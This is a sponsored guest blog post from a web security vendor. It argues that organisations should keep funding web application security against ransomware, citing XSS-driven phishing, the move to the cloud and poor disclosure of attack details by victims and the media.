A key part of some ransomware attack chains, web vulnerabilities are a source of major
problems for global organizations. For that reason, many businesses have decided to put all of
their efforts into protecting against ransomware specifically – even if that means shifting budgets
away from web application security (AppSec) to provide more financial wiggle room. While the
idea may seem tempting, it means making IT systems less secure against ransomware instead
of future-proofing their assets, systems, and processes.
Read on for five key reasons why MSSP clients need to take care of web security if they want to
avoid ransomware today and in the future.
1: Ransomware Isn't the Attack Itself but the Consequence of an Attack
Although ransomware is a type of payload that results from a successful cyberattack, it isn’t the
attack itself and confusing it as such is dangerous. Consider for a moment that you’re sick with
a cold; the ransomware software represents a bacteria or a virus that you need to fight before it
gets worse. Once the virus is in, it can multiply and infect your entire body, sometimes with fatal
results. The same goes for ransomware, and once it's in your systems, it can be too late.
Fortunately, bacteria cannot jump from one host to the next spontaneously, and neither can
ransomware. Ransomware must be introduced into the system somehow, and prevention is
better than cure, which means the most effective defensive measures that MSSP clients can
take are those that actually prevent ransomware from entering systems to begin with.
Just like with viruses, there are several ways for ransomware to spread in systems. You might
catch an airborne virus by inhaling it after someone coughs or sneezes or by touching someone
else already infected. Ransomware payloads, similarly, can be transmitted by phishing and
social engineering or through direct exploit of system vulnerabilities. Since most remote exploits
will involve web vulnerabilities, that is where MSSP clients need to place their first lines of
defense. The only way to protect against ransomware is to prevent attacks used to deliver the
ransomware, because once it’s in and spreading, it's too late.
2: Web-Based Attacks are Where Ransomware Grows and Thrives
Social engineering and phishing attacks are often considered the most common ways for bad
guys to deliver ransomware to unsuspecting victims. But just how successful the phishing
attempt is depends on common web vulnerabilities like cross-site scripting (XSS) which open
the door for more convincing attacks by abusing trust.
For example, let’s say that an organization has a web application with a XSS vulnerability that
allows an attacker to send phishing messages to employees, and the messages include
malicious URLs. If of the organization’s authenticated employees falls for the scam and visits the vulnerable page via the malicious link, they will be redirected automatically to a malicious
site. There, the browser downloads a ransomware installer and the infection begins. And,
unfortunately, employees worldwide fall for similar tricks every day.
In worse situations, attackers can use vulnerable web applications to attack business partners,
customers, or the general public, covering their tracks while exposing security weaknesses for
lasting damage to reputation. MSSP clients who want to minimize this risk need to make sure
no sites or applications operating under their domain names have such XSS vulnerabilities to
exploit.
3: As Businesses Move to the Cloud, So Do Cybercriminals
As we said previously, there are several ways for threat actors to deliver ransomware to a
targeted system, and many of those involve vulnerabilities. It wasn’t very long ago that the most
attractive vulnerabilities were those in on-premises systems, like network security issues caused
by device misconfigurations or legacy software that hasn’t been updated in a while. The
pandemic only fueled more work-from-home and remote environments, which means that
on-prem networks are no longer the norm.
What’s taking the place of on-prem networks and infrastructure? Cloud solutions based
completely on web technologies. When we look at this through the lens of security, this shift to
the cloud only means we need to place more emphasis on the risk and frequency of web
vulnerabilities. Security issues that were once limited to, for example, marketing websites may
now impact business-critical systems and data for MSSP clients making the shift to the cloud.
Bad actors are keeping up with these modern changes. They know the old methods like sending
a malicious encryptor off to crawl through a local network and infect physical devices and
servers just can’t cut it anymore. More and more potential victims are using their web browsers
as thin clients to access data in the cloud, which means threat actors are turning toward web
and cloud vulnerabilities to get the job done. By focusing on network security instead of web
security, MSSP customers could be leaving gaping holes for attackers to go after.
4: Attack Details Are Not reported by Ransomware Victims
Many organizations that suffer a ransomware attack don’t share valuable details after the fact,
so finding reliable ways to defend against ransomware can be tricky. Oftentimes, there is a
public statement issued about the ransomware attack, but nothing else of substance is provided
that can give other organizations a heads-up.
This behavior is understandable for many reasons: an organization might not be able to get to
the root of the security weakness and fix it quickly right after an attack. Plus, sharing such attack
vector details might even lead to additional attacks for the business, so some companies shy
away. And finally, because admitting to a breach or ransomware attack reflects poorly on
reputation, there is often hesitation to openly share security mistakes.
Whether justified or not, these practices slow or stall the design of efficient protection methods
and can have a negative impact on IT security for MSSP clients across the globe. Refusing to
share critical details of an attack is akin to a country suffering a deadly virus and then not
sharing any information with the rest of the world for political reasons. Doing the same with
ransomware attacks can make it difficult for the entire global community to avoid and prevent
them in the future.
5: Reports From the Media Focus on the Incidents and Not on Solutions
Even in rare cases where attack details are known, the media typically omits technical details,
making these information gaps even more prominent. Media instead tends to focus on popular
aspects of the story, like business impact and financial damages. As an example, finding out
that the 2019 Capital One data breach was caused by server-side request forgery (SSRF)
meant digging deeply into search engines to uncover the crucial information because it wasn’t being reported on in detail.
As media and business behaviors don’t help lessen the severity of the situation for MSSP
clients and organizations across the globe, we look to enterprises that follow best practices
around incident disclosure. Cloudflare is a great example of an organization that discloses
security incidents in great detail, as they did with a huge outage in 2019 that was caused by an
error when setting up a web application firewall (WAF).
Ideally, the media should share all known details of a ransomware attack to better inform the
global community about danger symptoms so we can all better protect ourselves in the future.
Guest blog courtesy of Invicti, an international web app security company headquartered in Austin, Texas. See more Invicti guest blogs here. Regularly contributed guest blogs are part of MSSP Alert’s sponsorship program.
